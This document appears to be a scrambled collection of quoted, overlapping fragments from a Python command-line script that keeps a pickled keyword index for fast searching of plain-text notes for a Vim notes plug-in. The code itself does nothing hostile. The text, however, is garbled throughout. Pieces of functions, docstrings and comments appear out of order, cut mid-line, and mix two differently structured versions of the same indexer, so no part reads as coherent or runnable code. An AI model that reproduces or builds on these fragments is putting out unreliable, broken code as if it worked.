index['keywords']] for word in", "pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", self.index['version']) assert self.index['version'] ==", "for loop over all keywords in the index. If # I really have", "filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from index: %s\", filename)", "self.database_file) with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format version of index", "to search all of the user's notes: # # - Very large notes", "for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into", "# License: MIT # # This Python script can be used by the", "]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) # Define the command line", "-e, --encoding=NAME set character encoding of notes -v, --verbose make more noise -h,", "with user notes (can be repeated) -e, --encoding=NAME set character encoding of notes", "logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to", "return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if", "Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in", "index by scanning the notes directory.\"\"\" update_timer = Timer() # First we find", "really have to I'll probably come up with something more # efficient, but", "-l, --list=SUBSTR list keywords matching substring -d, --database=FILE set path to keywords index", "True self.dirty = True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def", "None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for", "character encoding of notes -v, --verbose make more noise -h, --help show this", "\"\"\"Return names of files containing all of the given keywords.\"\"\" matches = None", "directory with user notes (can be repeated) -e, --encoding=NAME set character encoding of", "index = self.index # First we find the filenames and last modified times", "= Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file, 'rb') as handle:", "def munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self):", "last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note, we can forget about", "of normalized, unique keywords.\"\"\" words = set() text = self.decode(text) for word in", "just # using Vim's internal :vimgrep command to search all of the user's", "indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8')", "for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm using a nested for loop", "start with an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s", "doesn't seem to be needed -- I have over # 850 notes (about", "of plain text files using a full text index, updated automatically during each", "with an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s ..\",", "The version of the index format that's supported by this revision of the", "normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not", "pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self): \"\"\"Update the", "self.index['keywords']] for usr_kw in keywords: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords:", "find the filenames and last modified times of the notes on disk. notes_on_disk", "searching using keyword index on disk. # # Author: <NAME> <<EMAIL>> # Last", "in needles: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in", "information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search", "of notes can be searched in less than a second. # # The", "sure repeating strings are stored only # once, so it's not as bad", "= set() for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm using a nested", "keyword index or start with an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading", "('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file)", "note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] =", ":-). # # For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\"", "detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded %i notes from index in", "index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note", "= os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading", "Search one or more directories of plain text files using a full text", "containing all of the given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k))", "with something more # efficient, but really it doesn't seem to be needed", "usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep track of long", "if matches else [] def list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords to", "keyword): \"\"\"Normalize the case of a keyword if configured to do so.\"\"\" return", "scanning the notes directory.\"\"\" user_directories = self.notes_directories index = self.index # First we", "decorated = [] substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw =", "Hundreds of notes can be searched in less than a second. # #", "if kw not in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index,", "path to keywords index file -n, --notes=DIR set directory with user notes (can", "once, so it's not as bad as it may appear at first sight", "usr_kw in keywords: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes", "handle: self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", self.index['version'])", "= load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return names of files containing", "changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename,", "logger.info(\"Adding file to index: %s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as", "pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes", "names of files containing all of the given keywords.\"\"\" print('Searching index') index =", "be needed -- I have over # 850 notes (about 8 MB) and", "index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file", "as handle: for kw in self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw] =", "sight :-). # # For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/.", "bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize user-defined", "last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk)", ">= 2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the case of a", "= notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) #", "%i notes from index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load", "opts: if opt in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif", "that it should rebuild the index. INDEX_VERSION = 3 # Filename matching patterns", "naive but it's quite # fast. Also the pickle protocol makes sure repeating", "If # I really have to I'll probably come up with something more", "len(word) >= 2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the case of", "k in index['keywords']] for word in needles: submatches = set() for original_db_kw, normalized_db_kw", "second. # # The keyword index is a Python dictionary that's persisted using", "keywords): \"\"\"Return names of files containing all of the given keywords.\"\"\" matches =", "opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage() sys.exit(0) else:", "submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &= submatches return", "in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):", "in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a note to the index", "from index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x", "0 for directory in self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory):", "global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts, keywords =", "the pickle protocol makes sure repeating strings are stored only # once, so", "slow searching down so much; # - Hundreds of notes can be searched", "exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords': {}, 'files': {},", "str) -> List[str]: \"\"\"Return names of files containing all of the given keywords.\"\"\"", "the index. INDEX_VERSION = 3 # Filename matching patterns of files to ignore", "to be needed -- I have over # 850 notes (about 8 MB)", "only # once, so it's not as bad as it may appear at", "class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories =", "making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use", "add_note(self, filename, last_modified): \"\"\"Add a note to the index (assumes the note is", "except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True) return {'keywords': {}, 'files':", "try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file, 'rb')", "None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories", "index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords = [(k, k.lower())", "original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm using a nested for loop over", "self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename] self.dirty =", "encoding: %s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize", "%s ..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format version", "'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2)", "text file searching using keyword index on disk. # # Author: <NAME> <<EMAIL>>", "= [x for x in index['keywords'][kw] if x != filename] def tokenize(self, text:", "# - Very large notes don't slow searching down so much; # -", "notes. It has two advantages over just # using Vim's internal :vimgrep command", "in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index from file!\", exc_info=True)", "filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: raw = handle.read() for", "= 'UTF-8' self.case_sensitive = True self.keyword_filter = None # Map command line options", "in index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename]", "logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index =", "searching down so much; # - Hundreds of notes can be searched in", "handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer", "bad as it may appear at first sight :-). # # For more", "&= submatches return sorted(matches) if matches else [] def update_index(self): \"\"\"Update the keyword", "opt in ('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file:", "--ignore-case ignore case of keyword(s) -l, --list=SUBSTR list keywords matching substring -d, --database=FILE", "index loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format", "full text index, updated automatically during each invocation of the program. Valid options", "print(str(error)) self.usage() sys.exit(2) # Define the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle'", "%i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes", "= submatches else: matches &= submatches return list(matches) if matches else [] def", "notes ..\", len(notes_on_disk)) # Check for updated and/or deleted notes since the last", "self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note, we can forget about it.", "as bad as it may appear at first sight :-). # # For", "script knows that it should rebuild the index. INDEX_VERSION = 3 # Filename", "argv): \"\"\"Parse the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [", "matches is None: matches = submatches else: matches &= submatches return list(matches) if", "-len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]]", "Check for updated and/or deleted notes since the last run? if index: for", "%i notes ..\", len(notes_on_disk)) # Check for updated and/or deleted notes since the", "file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else: return index class", "index from %s ..\", index_location) with open(index_location, 'rb') as handle: index = pickle.load(handle)", "[x for x in self.index['keywords'][kw] if x != filename] self.dirty = True def", "to standard output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring) for kw,", "of a keyword if configured to do so.\"\"\" return keyword if self.case_sensitive else", "text: str) -> Set[str]: \"\"\"Tokenize a string into a list of normalized, unique", "nested for loop over all keywords in the index. If # I really", "matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the", "--database=FILE set path to keywords index file -n, --notes=DIR set directory with user", "= os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count", "time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time()", "Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified)", "seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk >", "logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s", "__init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def", "self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\"", "!= filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into a", "self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches = set() for", "self.case_sensitive = True self.keyword_filter = None # Map command line options to variables.", "import logging import os import re import sys import time import pickle from", "a string in the user's preferred character encoding.\"\"\" if isinstance(text, str): text =", "munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip())", "the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding =", "logger.debug(\"Format version of index loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION,", "Also the pickle protocol makes sure repeating strings are stored only # once,", "try: import Levenshtein except ImportError: Levenshtein = None # The version of the", "# using Vim's internal :vimgrep command to search all of the user's notes:", "= [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from given", "notes on disk. notes_on_disk = {} last_count = 0 for directory in user_directories:", "can forget about it. del notes_on_disk[filename] # Add new notes to index. for", "index format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer) except", "the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or", "by this revision of the # `search_notes.py' script; if an existing index file", "return words def normalize(self, keyword): \"\"\"Normalize the case of a keyword if configured", "set(index['files'].keys()): if filename not in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename)", "`search_notes.py' script; if an existing index file is found with an # unsupported", "# Already checked this note, we can forget about it. del notes_on_disk[filename] #", "self.first_use = False self.dirty = False logger.debug(\"Loaded %i notes from index in %s\",", "more # efficient, but really it doesn't seem to be needed -- I", "# Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified)", "not self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget", "it doesn't seem to be needed -- I have over # 850 notes", "normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &= submatches", "= None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in", "index. INDEX_VERSION = 3 # Filename matching patterns of files to ignore during", "\"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\",", "index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for", "self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", self.index['version']) assert", "the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index()", "automatically during each invocation of the program. Valid options include: -i, --ignore-case ignore", "library modules. import codecs import fnmatch import getopt import logging import os import", "modules. import codecs import fnmatch import getopt import logging import os import re", "directory) for root, dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename,", "TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories", "supported by this revision of the # `search_notes.py' script; if an existing index", "using a nested for loop over all keywords in the index. If #", "Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in", "# # - Very large notes don't slow searching down so much; #", "script; if an existing index file is found with an # unsupported version,", "logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk)", "\"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as", "__str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time", "of keyword(s) -l, --list=SUBSTR list keywords matching substring -d, --database=FILE set path to", "TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add", "as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the", "previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk", "[self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return", "have to I'll probably come up with something more # efficient, but really", "each invocation of the program. Valid options include: -i, --ignore-case ignore case of", "= time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return", "Levenshtein except ImportError: Levenshtein = None # The version of the index format", "logger.info(\"Found a total of %i notes ..\", len(notes_on_disk)) # Check for updated and/or", "!= '' and not word.isspace() and len(word) >= 2: words.add(word) return words def", "disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the", "notes from index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index", "efficient, but really it doesn't seem to be needed -- I have over", "on disk. notes_on_disk = {} last_count = 0 for directory in self.user_directories: print('Scanning',", "self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a", "unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()}", "last modified times of the notes on disk. notes_on_disk = {} last_count =", "persisted using the pickle # module. The structure of the dictionary may seem", "to do so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode", "for fast text file searching using keyword index on disk. # # Author:", "arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=',", "from index: %s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x", "to keywords index file -n, --notes=DIR set directory with user notes (can be", "open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer)", "word.strip() if word != '' and not word.isspace() and len(word) >= 2: words.add(word)", "index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex: def", "= set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if", "[self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or", "by scanning the notes directory.\"\"\" user_directories = self.notes_directories index = self.index # First", "down so much; # - Hundreds of notes can be searched in less", "index format that's supported by this revision of the # `search_notes.py' script; if", "to keep track of long during operations.\"\"\" def __init__(self): self.start_time = time.time() def", "'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer()", "\"\"\"Entry point to the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or", "# # For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage:", "sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished", "directory.\"\"\" update_timer = Timer() # First we find the filenames and last modified", "I'm using a nested for loop over all keywords in the index. If", "a full text index, updated automatically during each invocation of the program. Valid", "text files using a full text index, updated automatically during each invocation of", "logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if", "class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer =", "a string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text =", "matches = submatches else: matches &= submatches return list(matches) if matches else []", "given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None", "# `search_notes.py' script; if an existing index file is found with an #", "%s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of", "usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches", "string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text,", "INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']),", "it's quite # fast. Also the pickle protocol makes sure repeating strings are", "elif opt in ('-d', '--database'): self.database_file = arg elif opt in ('-n', '--notes'):", "elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v', '--verbose'):", "on disk. # # Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015", "of the program. Valid options include: -i, --ignore-case ignore case of keyword(s) -l,", "def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index", "for directory in self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory): for", "index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index,", "\"\"\"Load the keyword index or start with an empty one.\"\"\" try: load_timer =", "substring, limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing keywords') decorated =", "{'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def", "see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories of", "with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\",", "handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self): \"\"\"Update", "pickle protocol makes sure repeating strings are stored only # once, so it's", "loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\"", "k in self.index['keywords']] for usr_kw in keywords: submatches = set() for original_db_kw, normalized_db_kw", "self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget a", "unique keywords.\"\"\" words = set() text = self.decode(text) for word in re.findall(r'\\w+', text,", "load index from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else:", "= {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__)", "--notes=DIR set directory with user notes (can be repeated) -e, --encoding=NAME set character", "abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\",", "seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk >", "in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in", "as handle: raw = handle.read() for kw in tokenize(raw): if kw not in", "index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from", "of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches", "in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts,", "save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb')", "decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def", "as it may appear at first sight :-). # # For more information", "= submatches else: matches &= submatches return sorted(matches) if matches else [] def", "unsupported version, the script knows that it should rebuild the index. INDEX_VERSION =", "an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file)", "new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) #", "load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords = [(k, k.lower()) for k", "self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self,", "%s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames,", "database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb') as", "the last run? if not self.first_use: for filename in self.index['files'].keys(): if filename not", "file!\", exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords': {}, 'files':", "format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer) except Exception:", "'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]):", "[(k, k.lower()) for k in index['keywords']] for word in needles: submatches = set()", "submatches return sorted(matches) if matches else [] def update_index(self): \"\"\"Update the keyword index", "return sorted(matches) if matches else [] def update_index(self): \"\"\"Update the keyword index by", "self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v',", "this message and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library", "for x in index['keywords'][kw] if x != filename] def tokenize(self, text: str) ->", "{}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer =", "encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self,", "notes_on_disk = {} last_count = 0 for directory in user_directories: for root, dirs,", "self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if __name__ == '__main__': NotesIndex()", "deleted note. self.delete_note(filename) else: # Check whether previously seen note has changed? last_modified_on_disk", "exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs", "load_index(self): \"\"\"Load the keyword index or start with an empty one.\"\"\" try: load_timer", "len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of %i notes", "plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories", "INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s", "not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\"", "option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive =", "850 notes (about 8 MB) and 25000 keywords and it's plenty fast. if", "kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein", "submatches else: matches &= submatches return list(matches) if matches else [] def list_keywords(self,", "filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget a deleted note.", "pickle from typing import List, Set try: import Levenshtein except ImportError: Levenshtein =", "file to index: %s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle:", "print('Scanning', directory) for root, dirs, files in os.walk(directory): for filename in files: if", "= {} last_count = 0 for directory in user_directories: for root, dirs, files", "it's not as bad as it may appear at first sight :-). #", "http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can be used by", "= False self.dirty = False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']),", "file from index: %s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] =", "of the index format that's supported by this revision of the # `search_notes.py'", "the keyword index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index =", "we find the filenames and last modified times of the notes on disk.", "using Vim's internal :vimgrep command to search all of the user's notes: #", "= Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as handle:", "since the last run? if not self.first_use: for filename in self.index['files'].keys(): if filename", "has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index,", "set path to keywords index file -n, --notes=DIR set directory with user notes", "about it. del notes_on_disk[filename] # Add new notes to index. for filename, last_modified", "notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already", "2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can", "the program. Valid options include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR", "encoding of notes -v, --verbose make more noise -h, --help show this message", "\"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) 